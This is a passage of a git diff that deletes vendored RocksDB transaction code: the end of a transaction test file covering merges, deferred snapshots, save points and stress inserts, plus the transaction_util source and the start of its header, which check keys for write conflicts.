-  // overwritten will have undefinied behavior.  So it is unclear what the
-  // result of fetching "A" should be. The current implementation will
-  // return NotFound in this case.
-  s = txn->Get(read_options, "A", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn2->Put("B", "b");
-  ASSERT_TRUE(s.IsTimedOut());
-  s = txn2->Commit();
-  ASSERT_OK(s);
-  delete txn2;
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-  delete txn;
-
-  // According to db.h, doing a SingleDelete on a key that has been
-  // overwritten will have undefinied behavior.  So it is unclear what the
-  // result of fetching "A" should be. The current implementation will
-  // return NotFound in this case.
-  s = db->Get(read_options, "A", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = db->Get(read_options, "B", &value);
-  ASSERT_TRUE(s.IsNotFound());
-}
-
-TEST_P(TransactionTest, MergeTest) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  Transaction* txn = db->BeginTransaction(write_options, TransactionOptions());
-  ASSERT_TRUE(txn);
-
-  s = db->Put(write_options, "A", "a0");
-  ASSERT_OK(s);
-
-  s = txn->Merge("A", "1");
-  ASSERT_OK(s);
-
-  s = txn->Merge("A", "2");
-  ASSERT_OK(s);
-
-  s = txn->Get(read_options, "A", &value);
-  ASSERT_TRUE(s.IsMergeInProgress());
-
-  s = txn->Put("A", "a");
-  ASSERT_OK(s);
-
-  s = txn->Get(read_options, "A", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("a", value);
-
-  s = txn->Merge("A", "3");
-  ASSERT_OK(s);
-
-  s = txn->Get(read_options, "A", &value);
-  ASSERT_TRUE(s.IsMergeInProgress());
-
-  TransactionOptions txn_options;
-  txn_options.lock_timeout = 1;  // 1 ms
-  Transaction* txn2 = db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn2);
-
-  // verify that txn has "A" locked
-  s = txn2->Merge("A", "4");
-  ASSERT_TRUE(s.IsTimedOut());
-
-  s = txn2->Commit();
-  ASSERT_OK(s);
-  delete txn2;
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-  delete txn;
-
-  s = db->Get(read_options, "A", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("a,3", value);
-}
-
-TEST_P(TransactionTest, DeferSnapshotTest) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  s = db->Put(write_options, "A", "a0");
-  ASSERT_OK(s);
-
-  Transaction* txn1 = db->BeginTransaction(write_options);
-  Transaction* txn2 = db->BeginTransaction(write_options);
-
-  txn1->SetSnapshotOnNextOperation();
-  auto snapshot = txn1->GetSnapshot();
-  ASSERT_FALSE(snapshot);
-
-  s = txn2->Put("A", "a2");
-  ASSERT_OK(s);
-  s = txn2->Commit();
-  ASSERT_OK(s);
-  delete txn2;
-
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  // Should not conflict with txn2 since snapshot wasn't set until
-  // GetForUpdate was called.
-  ASSERT_OK(s);
-  ASSERT_EQ("a2", value);
-
-  s = txn1->Put("A", "a1");
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "B", "b0");
-  ASSERT_OK(s);
-
-  // Cannot lock B since it was written after the snapshot was set
-  s = txn1->Put("B", "b1");
-  ASSERT_TRUE(s.IsBusy());
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-  delete txn1;
-
-  s = db->Get(read_options, "A", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("a1", value);
-
-  s = db->Get(read_options, "B", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("b0", value);
-}
-
-TEST_P(TransactionTest, DeferSnapshotTest2) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  string value;
-  Status s;
-
-  Transaction* txn1 = db->BeginTransaction(write_options);
-
-  txn1->SetSnapshot();
-
-  s = txn1->Put("A", "a1");
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "C", "c0");
-  ASSERT_OK(s);
-  s = db->Put(write_options, "D", "d0");
-  ASSERT_OK(s);
-
-  snapshot_read_options.snapshot = txn1->GetSnapshot();
-
-  txn1->SetSnapshotOnNextOperation();
-
-  s = txn1->Get(snapshot_read_options, "C", &value);
-  // Snapshot was set before C was written
-  ASSERT_TRUE(s.IsNotFound());
-  s = txn1->Get(snapshot_read_options, "D", &value);
-  // Snapshot was set before D was written
-  ASSERT_TRUE(s.IsNotFound());
-
-  // Snapshot should not have changed yet.
-  snapshot_read_options.snapshot = txn1->GetSnapshot();
-
-  s = txn1->Get(snapshot_read_options, "C", &value);
-  // Snapshot was set before C was written
-  ASSERT_TRUE(s.IsNotFound());
-  s = txn1->Get(snapshot_read_options, "D", &value);
-  // Snapshot was set before D was written
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn1->GetForUpdate(read_options, "C", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("c0", value);
-
-  s = db->Put(write_options, "D", "d00");
-  ASSERT_OK(s);
-
-  // Snapshot is now set
-  snapshot_read_options.snapshot = txn1->GetSnapshot();
-  s = txn1->Get(snapshot_read_options, "D", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("d0", value);
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-  delete txn1;
-}
-
-TEST_P(TransactionTest, DeferSnapshotSavePointTest) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  string value;
-  Status s;
-
-  Transaction* txn1 = db->BeginTransaction(write_options);
-
-  txn1->SetSavePoint();  // 1
-
-  s = db->Put(write_options, "T", "1");
-  ASSERT_OK(s);
-
-  txn1->SetSnapshotOnNextOperation();
-
-  s = db->Put(write_options, "T", "2");
-  ASSERT_OK(s);
-
-  txn1->SetSavePoint();  // 2
-
-  s = db->Put(write_options, "T", "3");
-  ASSERT_OK(s);
-
-  s = txn1->Put("A", "a");
-  ASSERT_OK(s);
-
-  txn1->SetSavePoint();  // 3
-
-  s = db->Put(write_options, "T", "4");
-  ASSERT_OK(s);
-
-  txn1->SetSnapshot();
-  txn1->SetSnapshotOnNextOperation();
-
-  txn1->SetSavePoint();  // 4
-
-  s = db->Put(write_options, "T", "5");
-  ASSERT_OK(s);
-
-  snapshot_read_options.snapshot = txn1->GetSnapshot();
-  s = txn1->Get(snapshot_read_options, "T", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("4", value);
-
-  s = txn1->Put("A", "a1");
-  ASSERT_OK(s);
-
-  snapshot_read_options.snapshot = txn1->GetSnapshot();
-  s = txn1->Get(snapshot_read_options, "T", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("5", value);
-
-  s = txn1->RollbackToSavePoint();  // Rollback to 4
-  ASSERT_OK(s);
-
-  snapshot_read_options.snapshot = txn1->GetSnapshot();
-  s = txn1->Get(snapshot_read_options, "T", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("4", value);
-
-  s = txn1->RollbackToSavePoint();  // Rollback to 3
-  ASSERT_OK(s);
-
-  snapshot_read_options.snapshot = txn1->GetSnapshot();
-  s = txn1->Get(snapshot_read_options, "T", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("3", value);
-
-  s = txn1->Get(read_options, "T", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("5", value);
-
-  s = txn1->RollbackToSavePoint();  // Rollback to 2
-  ASSERT_OK(s);
-
-  snapshot_read_options.snapshot = txn1->GetSnapshot();
-  ASSERT_FALSE(snapshot_read_options.snapshot);
-  s = txn1->Get(snapshot_read_options, "T", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("5", value);
-
-  s = txn1->Delete("A");
-  ASSERT_OK(s);
-
-  snapshot_read_options.snapshot = txn1->GetSnapshot();
-  ASSERT_TRUE(snapshot_read_options.snapshot);
-  s = txn1->Get(snapshot_read_options, "T", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("5", value);
-
-  s = txn1->RollbackToSavePoint();  // Rollback to 1
-  ASSERT_OK(s);
-
-  s = txn1->Delete("A");
-  ASSERT_OK(s);
-
-  snapshot_read_options.snapshot = txn1->GetSnapshot();
-  ASSERT_FALSE(snapshot_read_options.snapshot);
-  s = txn1->Get(snapshot_read_options, "T", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("5", value);
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  delete txn1;
-}
-
-TEST_P(TransactionTest, SetSnapshotOnNextOperationWithNotification) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-
-  class Notifier : public TransactionNotifier {
-   private:
-    const Snapshot** snapshot_ptr_;
-
-   public:
-    explicit Notifier(const Snapshot** snapshot_ptr)
-        : snapshot_ptr_(snapshot_ptr) {}
-
-    void SnapshotCreated(const Snapshot* newSnapshot) {
-      *snapshot_ptr_ = newSnapshot;
-    }
-  };
-
-  std::shared_ptr<Notifier> notifier =
-      std::make_shared<Notifier>(&read_options.snapshot);
-  Status s;
-
-  s = db->Put(write_options, "B", "0");
-  ASSERT_OK(s);
-
-  Transaction* txn1 = db->BeginTransaction(write_options);
-
-  txn1->SetSnapshotOnNextOperation(notifier);
-  ASSERT_FALSE(read_options.snapshot);
-
-  s = db->Put(write_options, "B", "1");
-  ASSERT_OK(s);
-
-  // A Get does not generate the snapshot
-  s = txn1->Get(read_options, "B", &value);
-  ASSERT_OK(s);
-  ASSERT_FALSE(read_options.snapshot);
-  ASSERT_EQ(value, "1");
-
-  // Any other operation does
-  s = txn1->Put("A", "0");
-  ASSERT_OK(s);
-
-  // Now change "B".
-  s = db->Put(write_options, "B", "2");
-  ASSERT_OK(s);
-
-  // The original value should still be read
-  s = txn1->Get(read_options, "B", &value);
-  ASSERT_OK(s);
-  ASSERT_TRUE(read_options.snapshot);
-  ASSERT_EQ(value, "1");
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  delete txn1;
-}
-
-TEST_P(TransactionTest, ClearSnapshotTest) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  string value;
-  Status s;
-
-  s = db->Put(write_options, "foo", "0");
-  ASSERT_OK(s);
-
-  Transaction* txn = db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  s = db->Put(write_options, "foo", "1");
-  ASSERT_OK(s);
-
-  snapshot_read_options.snapshot = txn->GetSnapshot();
-  ASSERT_FALSE(snapshot_read_options.snapshot);
-
-  // No snapshot created yet
-  s = txn->Get(snapshot_read_options, "foo", &value);
-  ASSERT_EQ(value, "1");
-
-  txn->SetSnapshot();
-  snapshot_read_options.snapshot = txn->GetSnapshot();
-  ASSERT_TRUE(snapshot_read_options.snapshot);
-
-  s = db->Put(write_options, "foo", "2");
-  ASSERT_OK(s);
-
-  // Snapshot was created before change to '2'
-  s = txn->Get(snapshot_read_options, "foo", &value);
-  ASSERT_EQ(value, "1");
-
-  txn->ClearSnapshot();
-  snapshot_read_options.snapshot = txn->GetSnapshot();
-  ASSERT_FALSE(snapshot_read_options.snapshot);
-
-  // Snapshot has now been cleared
-  s = txn->Get(snapshot_read_options, "foo", &value);
-  ASSERT_EQ(value, "2");
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  delete txn;
-}
-
-TEST_P(TransactionTest, ToggleAutoCompactionTest) {
-  Status s;
-
-  TransactionOptions txn_options;
-  ColumnFamilyHandle *cfa, *cfb;
-  ColumnFamilyOptions cf_options;
-
-  // Create 2 new column families
-  s = db->CreateColumnFamily(cf_options, "CFA", &cfa);
-  ASSERT_OK(s);
-  s = db->CreateColumnFamily(cf_options, "CFB", &cfb);
-  ASSERT_OK(s);
-
-  delete cfa;
-  delete cfb;
-  delete db;
-
-  // open DB with three column families
-  std::vector<ColumnFamilyDescriptor> column_families;
-  // have to open default column family
-  column_families.push_back(
-      ColumnFamilyDescriptor(kDefaultColumnFamilyName, ColumnFamilyOptions()));
-  // open the new column families
-  column_families.push_back(
-      ColumnFamilyDescriptor("CFA", ColumnFamilyOptions()));
-  column_families.push_back(
-      ColumnFamilyDescriptor("CFB", ColumnFamilyOptions()));
-
-  ColumnFamilyOptions* cf_opt_default = &column_families[0].options;
-  ColumnFamilyOptions* cf_opt_cfa = &column_families[1].options;
-  ColumnFamilyOptions* cf_opt_cfb = &column_families[2].options;
-  cf_opt_default->disable_auto_compactions = false;
-  cf_opt_cfa->disable_auto_compactions = true;
-  cf_opt_cfb->disable_auto_compactions = false;
-
-  std::vector<ColumnFamilyHandle*> handles;
-
-  s = TransactionDB::Open(options, txn_db_options, dbname, column_families,
-                          &handles, &db);
-  ASSERT_OK(s);
-
-  auto cfh_default = reinterpret_cast<ColumnFamilyHandleImpl*>(handles[0]);
-  auto opt_default = *cfh_default->cfd()->GetLatestMutableCFOptions();
-
-  auto cfh_a = reinterpret_cast<ColumnFamilyHandleImpl*>(handles[1]);
-  auto opt_a = *cfh_a->cfd()->GetLatestMutableCFOptions();
-
-  auto cfh_b = reinterpret_cast<ColumnFamilyHandleImpl*>(handles[2]);
-  auto opt_b = *cfh_b->cfd()->GetLatestMutableCFOptions();
-
-  ASSERT_EQ(opt_default.disable_auto_compactions, false);
-  ASSERT_EQ(opt_a.disable_auto_compactions, true);
-  ASSERT_EQ(opt_b.disable_auto_compactions, false);
-
-  for (auto handle : handles) {
-    delete handle;
-  }
-}
-
-TEST_P(TransactionTest, ExpiredTransactionDataRace1) {
-  // In this test, txn1 should succeed committing,
-  // as the callback is called after txn1 starts committing.
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"TransactionTest::ExpirableTransactionDataRace:1"}});
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "TransactionTest::ExpirableTransactionDataRace:1", [&](void* arg) {
-        WriteOptions write_options;
-        TransactionOptions txn_options;
-
-        // Force txn1 to expire
-        /* sleep override */
-        std::this_thread::sleep_for(std::chrono::milliseconds(150));
-
-        Transaction* txn2 = db->BeginTransaction(write_options, txn_options);
-        Status s;
-        s = txn2->Put("X", "2");
-        ASSERT_TRUE(s.IsTimedOut());
-        s = txn2->Commit();
-        ASSERT_OK(s);
-        delete txn2;
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  WriteOptions write_options;
-  TransactionOptions txn_options;
-
-  txn_options.expiration = 100;
-  Transaction* txn1 = db->BeginTransaction(write_options, txn_options);
-
-  Status s;
-  s = txn1->Put("X", "1");
-  ASSERT_OK(s);
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  ReadOptions read_options;
-  string value;
-  s = db->Get(read_options, "X", &value);
-  ASSERT_EQ("1", value);
-
-  delete txn1;
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-namespace {
-Status TransactionStressTestInserter(TransactionDB* db,
-                                     const size_t num_transactions,
-                                     const size_t num_sets,
-                                     const size_t num_keys_per_set) {
-  size_t seed = std::hash<std::thread::id>()(std::this_thread::get_id());
-  Random64 _rand(seed);
-  WriteOptions write_options;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-  txn_options.set_snapshot = true;
-
-  RandomTransactionInserter inserter(&_rand, write_options, read_options,
-                                     num_keys_per_set,
-                                     static_cast<uint16_t>(num_sets));
-
-  for (size_t t = 0; t < num_transactions; t++) {
-    bool success = inserter.TransactionDBInsert(db, txn_options);
-    if (!success) {
-      // unexpected failure
-      return inserter.GetLastStatus();
-    }
-  }
-
-  // Make sure at least some of the transactions succeeded.  It's ok if
-  // some failed due to write-conflicts.
-  if (inserter.GetFailureCount() > num_transactions / 2) {
-    return Status::TryAgain("Too many transactions failed! " +
-                            std::to_string(inserter.GetFailureCount()) + " / " +
-                            std::to_string(num_transactions));
-  }
-
-  return Status::OK();
-}
-}  // namespace
-
-TEST_P(MySQLStyleTransactionTest, TransactionStressTest) {
-  const size_t num_threads = 4;
-  const size_t num_transactions_per_thread = 10000;
-  const size_t num_sets = 3;
-  const size_t num_keys_per_set = 100;
-  // Setting the key-space to be 100 keys should cause enough write-conflicts
-  // to make this test interesting.
-
-  std::vector<port::Thread> threads;
-
-  std::function<void()> call_inserter = [&] {
-    ASSERT_OK(TransactionStressTestInserter(db, num_transactions_per_thread,
-                                            num_sets, num_keys_per_set));
-  };
-
-  // Create N threads that use RandomTransactionInserter to write
-  // many transactions.
-  for (uint32_t i = 0; i < num_threads; i++) {
-    threads.emplace_back(call_inserter);
-  }
-
-  // Wait for all threads to run
-  for (auto& t : threads) {
-    t.join();
-  }
-
-  // Verify that data is consistent
-  Status s = RandomTransactionInserter::Verify(db, num_sets);
-  ASSERT_OK(s);
-}
-
-TEST_P(TransactionTest, MemoryLimitTest) {
-  TransactionOptions txn_options;
-  // Header (12 bytes) + NOOP (1 byte) + 2 * 8 bytes for data.
-  txn_options.max_write_batch_size = 29;
-  string value;
-  Status s;
-
-  Transaction* txn = db->BeginTransaction(WriteOptions(), txn_options);
-  ASSERT_TRUE(txn);
-
-  ASSERT_EQ(0, txn->GetNumPuts());
-  ASSERT_LE(0, txn->GetID());
-
-  s = txn->Put(Slice("a"), Slice("...."));
-  ASSERT_OK(s);
-  ASSERT_EQ(1, txn->GetNumPuts());
-
-  s = txn->Put(Slice("b"), Slice("...."));
-  ASSERT_OK(s);
-  ASSERT_EQ(2, txn->GetNumPuts());
-
-  s = txn->Put(Slice("b"), Slice("...."));
-  ASSERT_TRUE(s.IsMemoryLimit());
-  ASSERT_EQ(2, txn->GetNumPuts());
-
-  txn->Rollback();
-  delete txn;
-}
-
-// Test WritePreparedTxnDB's IsInSnapshot against different ordering of
-// snapshot, max_committed_seq_, prepared, and commit entries.
-TEST_P(WritePreparedTransactionTest, IsInSnapshotTest) {
-  WriteOptions wo;
-  // Use small commit cache to trigger lots of eviction and fast advance of
-  // max_evicted_seq_
-  // will take effect after ReOpen
-  WritePreparedTxnDB::DEF_COMMIT_CACHE_SIZE = 8;
-  // Same for snapshot cache size
-  WritePreparedTxnDB::DEF_SNAPSHOT_CACHE_SIZE = 5;
-
-  // Take some preliminary snapshots first. This is to stress the data structure
-  // that holds the old snapshots as it will be designed to be efficient when
-  // only a few snapshots are below the max_evicted_seq_.
-  for (int max_snapshots = 1; max_snapshots < 20; max_snapshots++) {
-    // Leave some gap between the preliminary snapshots and the final snapshot
-    // that we check. This should test for also different overlapping scnearios
-    // between the last snapshot and the commits.
-    for (int max_gap = 1; max_gap < 10; max_gap++) {
-      // Since we do not actually write to db, we mock the seq as it would be
-      // increaased by the db. The only exception is that we need db seq to
-      // advance for our snapshots. for which we apply a dummy put each time we
-      // increase our mock of seq.
-      uint64_t seq = 0;
-      // At each step we prepare a txn and then we commit it in the next txn.
-      // This emulates the consecuitive transactions that write to the same key
-      uint64_t cur_txn = 0;
-      // Number of snapshots taken so far
-      int num_snapshots = 0;
-      std::vector<const Snapshot*> to_be_released;
-      // Number of gaps applied so far
-      int gap_cnt = 0;
-      // The final snapshot that we will inspect
-      uint64_t snapshot = 0;
-      bool found_committed = false;
-      // To stress the data structure that maintain prepared txns, at each cycle
-      // we add a new prepare txn. These do not mean to be committed for
-      // snapshot inspection.
-      std::set<uint64_t> prepared;
-      // We keep the list of txns comitted before we take the last snaphot.
-      // These should be the only seq numbers that will be found in the snapshot
-      std::set<uint64_t> committed_before;
-      ReOpen();  // to restart the db
-      WritePreparedTxnDB* wp_db = dynamic_cast<WritePreparedTxnDB*>(db);
-      assert(wp_db);
-      assert(wp_db->db_impl_);
-      // We continue until max advances a bit beyond the snapshot.
-      while (!snapshot || wp_db->max_evicted_seq_ < snapshot + 100) {
-        // do prepare for a transaction
-        wp_db->db_impl_->Put(wo, "key", "value");  // dummy put to inc db seq
-        seq++;
-        ASSERT_EQ(wp_db->db_impl_->GetLatestSequenceNumber(), seq);
-        wp_db->AddPrepared(seq);
-        prepared.insert(seq);
-
-        // If cur_txn is not started, do prepare for it.
-        if (!cur_txn) {
-          wp_db->db_impl_->Put(wo, "key", "value");  // dummy put to inc db seq
-          seq++;
-          ASSERT_EQ(wp_db->db_impl_->GetLatestSequenceNumber(), seq);
-          cur_txn = seq;
-          wp_db->AddPrepared(cur_txn);
-        } else {                                     // else commit it
-          wp_db->db_impl_->Put(wo, "key", "value");  // dummy put to inc db seq
-          seq++;
-          ASSERT_EQ(wp_db->db_impl_->GetLatestSequenceNumber(), seq);
-          wp_db->AddCommitted(cur_txn, seq);
-          if (!snapshot) {
-            committed_before.insert(cur_txn);
-          }
-          cur_txn = 0;
-        }
-
-        if (num_snapshots < max_snapshots - 1) {
-          // Take preliminary snapshots
-          auto tmp_snapshot = db->GetSnapshot();
-          to_be_released.push_back(tmp_snapshot);
-          num_snapshots++;
-        } else if (gap_cnt < max_gap) {
-          // Wait for some gap before taking the final snapshot
-          gap_cnt++;
-        } else if (!snapshot) {
-          // Take the final snapshot if it is not already taken
-          auto tmp_snapshot = db->GetSnapshot();
-          to_be_released.push_back(tmp_snapshot);
-          snapshot = tmp_snapshot->GetSequenceNumber();
-          // We increase the db seq artificailly by a dummy Put. Check that this
-          // technique is effective and db seq is that same as ours.
-          ASSERT_EQ(snapshot, seq);
-          num_snapshots++;
-        }
-
-        // If the snapshot is taken, verify seq numbers visible to it. We redo
-        // it at each cycle to test that the system is still sound when
-        // max_evicted_seq_ advances.
-        if (snapshot) {
-          for (uint64_t s = 0; s <= seq; s++) {
-            bool was_committed =
-                (committed_before.find(s) != committed_before.end());
-            bool is_in_snapshot = wp_db->IsInSnapshot(s, snapshot);
-            if (was_committed != is_in_snapshot) {
-              printf("max_snapshots %d max_gap %d seq %" PRIu64 " max %" PRIu64
-                     " snapshot %" PRIu64
-                     " gap_cnt %d num_snapshots %d s %" PRIu64 "\n",
-                     max_snapshots, max_gap, seq,
-                     wp_db->max_evicted_seq_.load(), snapshot, gap_cnt,
-                     num_snapshots, s);
-            }
-            ASSERT_EQ(was_committed, is_in_snapshot);
-            found_committed = found_committed || is_in_snapshot;
-          }
-        }
-      }
-      // Safety check to make sure the test actually ran
-      ASSERT_TRUE(found_committed);
-      // As an extra check, check if prepared set will be properly empty after
-      // they are committed.
-      if (cur_txn) {
-        wp_db->AddCommitted(cur_txn, seq);
-      }
-      for (auto p : prepared) {
-        wp_db->AddCommitted(p, seq);
-      }
-      ASSERT_TRUE(wp_db->delayed_prepared_.empty());
-      ASSERT_TRUE(wp_db->prepared_txns_.empty());
-      for (auto s : to_be_released) {
-        db->ReleaseSnapshot(s);
-      }
-    }
-  }
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr,
-          "SKIPPED as Transactions are not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/transaction_util.cc b/thirdparty/rocksdb/utilities/transactions/transaction_util.cc
deleted file mode 100644
index ad03a94..0000000
--- a/thirdparty/rocksdb/utilities/transactions/transaction_util.cc
+++ /dev/null
@@ -1,162 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include "utilities/transactions/transaction_util.h"
-
-#include <inttypes.h>
-#include <string>
-#include <vector>
-
-#include "db/db_impl.h"
-#include "rocksdb/status.h"
-#include "rocksdb/utilities/write_batch_with_index.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-Status TransactionUtil::CheckKeyForConflicts(DBImpl* db_impl,
-                                             ColumnFamilyHandle* column_family,
-                                             const std::string& key,
-                                             SequenceNumber key_seq,
-                                             bool cache_only) {
-  Status result;
-
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  auto cfd = cfh->cfd();
-  SuperVersion* sv = db_impl->GetAndRefSuperVersion(cfd);
-
-  if (sv == nullptr) {
-    result = Status::InvalidArgument("Could not access column family " +
-                                     cfh->GetName());
-  }
-
-  if (result.ok()) {
-    SequenceNumber earliest_seq =
-        db_impl->GetEarliestMemTableSequenceNumber(sv, true);
-
-    result = CheckKey(db_impl, sv, earliest_seq, key_seq, key, cache_only);
-
-    db_impl->ReturnAndCleanupSuperVersion(cfd, sv);
-  }
-
-  return result;
-}
-
-Status TransactionUtil::CheckKey(DBImpl* db_impl, SuperVersion* sv,
-                                 SequenceNumber earliest_seq,
-                                 SequenceNumber key_seq, const std::string& key,
-                                 bool cache_only) {
-  Status result;
-  bool need_to_read_sst = false;
-
-  // Since it would be too slow to check the SST files, we will only use
-  // the memtables to check whether there have been any recent writes
-  // to this key after it was accessed in this transaction.  But if the
-  // Memtables do not contain a long enough history, we must fail the
-  // transaction.
-  if (earliest_seq == kMaxSequenceNumber) {
-    // The age of this memtable is unknown.  Cannot rely on it to check
-    // for recent writes.  This error shouldn't happen often in practice as
-    // the Memtable should have a valid earliest sequence number except in some
-    // corner cases (such as error cases during recovery).
-    need_to_read_sst = true;
-
-    if (cache_only) {
-      result = Status::TryAgain(
-          "Transaction ould not check for conflicts as the MemTable does not "
-          "countain a long enough history to check write at SequenceNumber: ",
-          ToString(key_seq));
-    }
-  } else if (key_seq < earliest_seq) {
-    need_to_read_sst = true;
-
-    if (cache_only) {
-      // The age of this memtable is too new to use to check for recent
-      // writes.
-      char msg[300];
-      snprintf(msg, sizeof(msg),
-               "Transaction could not check for conflicts for operation at "
-               "SequenceNumber %" PRIu64
-               " as the MemTable only contains changes newer than "
-               "SequenceNumber %" PRIu64
-               ".  Increasing the value of the "
-               "max_write_buffer_number_to_maintain option could reduce the "
-               "frequency "
-               "of this error.",
-               key_seq, earliest_seq);
-      result = Status::TryAgain(msg);
-    }
-  }
-
-  if (result.ok()) {
-    SequenceNumber seq = kMaxSequenceNumber;
-    bool found_record_for_key = false;
-
-    Status s = db_impl->GetLatestSequenceForKey(sv, key, !need_to_read_sst,
-                                                &seq, &found_record_for_key);
-
-    if (!(s.ok() || s.IsNotFound() || s.IsMergeInProgress())) {
-      result = s;
-    } else if (found_record_for_key && (seq > key_seq)) {
-      // Write Conflict
-      result = Status::Busy();
-    }
-  }
-
-  return result;
-}
-
-Status TransactionUtil::CheckKeysForConflicts(DBImpl* db_impl,
-                                              const TransactionKeyMap& key_map,
-                                              bool cache_only) {
-  Status result;
-
-  for (auto& key_map_iter : key_map) {
-    uint32_t cf_id = key_map_iter.first;
-    const auto& keys = key_map_iter.second;
-
-    SuperVersion* sv = db_impl->GetAndRefSuperVersion(cf_id);
-    if (sv == nullptr) {
-      result = Status::InvalidArgument("Could not access column family " +
-                                       ToString(cf_id));
-      break;
-    }
-
-    SequenceNumber earliest_seq =
-        db_impl->GetEarliestMemTableSequenceNumber(sv, true);
-
-    // For each of the keys in this transaction, check to see if someone has
-    // written to this key since the start of the transaction.
-    for (const auto& key_iter : keys) {
-      const auto& key = key_iter.first;
-      const SequenceNumber key_seq = key_iter.second.seq;
-
-      result = CheckKey(db_impl, sv, earliest_seq, key_seq, key, cache_only);
-
-      if (!result.ok()) {
-        break;
-      }
-    }
-
-    db_impl->ReturnAndCleanupSuperVersion(cf_id, sv);
-
-    if (!result.ok()) {
-      break;
-    }
-  }
-
-  return result;
-}
-
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/transaction_util.h b/thirdparty/rocksdb/utilities/transactions/transaction_util.h
deleted file mode 100644
index 5c6b8fa..0000000
--- a/thirdparty/rocksdb/utilities/transactions/transaction_util.h
+++ /dev/null
@@ -1,78 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <string>
-#include <unordered_map>
-
-#include "rocksdb/db.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/status.h"
-#include "rocksdb/types.h"
-
-namespace rocksdb {
-
-struct TransactionKeyMapInfo {
-  // Earliest sequence number that is relevant to this transaction for this key
-  SequenceNumber seq;
-
-  uint32_t num_writes;
-  uint32_t num_reads;
-
-  bool exclusive;
-
-  explicit TransactionKeyMapInfo(SequenceNumber seq_no)
-      : seq(seq_no), num_writes(0), num_reads(0), exclusive(false) {}
-};
-
-using TransactionKeyMap =
-    std::unordered_map<uint32_t,
-                       std::unordered_map<std::string, TransactionKeyMapInfo>>;
-
-class DBImpl;
-struct SuperVersion;
-class WriteBatchWithIndex;
-
-class TransactionUtil {
- public:
-  // Verifies there have been no writes to this key in the db since this
-  // sequence number.
-  //
-  // If cache_only is true, then this function will not attempt to read any
-  // SST files.  This will make it more likely this function will
-  // return an error if it is unable to determine if there are any conflicts.
-  //
-  // Returns OK on success, BUSY if there is a conflicting write, or other error
-  // status for any unexpected errors.
-  static Status CheckKeyForConflicts(DBImpl* db_impl,
-                                     ColumnFamilyHandle* column_family,
-                                     const std::string& key,
-                                     SequenceNumber key_seq, bool cache_only);
-
-  // For each key,SequenceNumber pair in the TransactionKeyMap, this function
-  // will verify there have been no writes to the key in the db since that
-  // sequence number.
-  //
-  // Returns OK on success, BUSY if there is a conflicting write, or other error
-  // status for any unexpected errors.
-  //
-  // REQUIRED: this function should only be called on the write thread or if the
-  // mutex is held.
-  static Status CheckKeysForConflicts(DBImpl* db_impl,
-                                      const TransactionKeyMap& keys,
-                                      bool cache_only);
-
- private:
-  static Status CheckKey(DBImpl* db_impl, SuperVersion* sv,
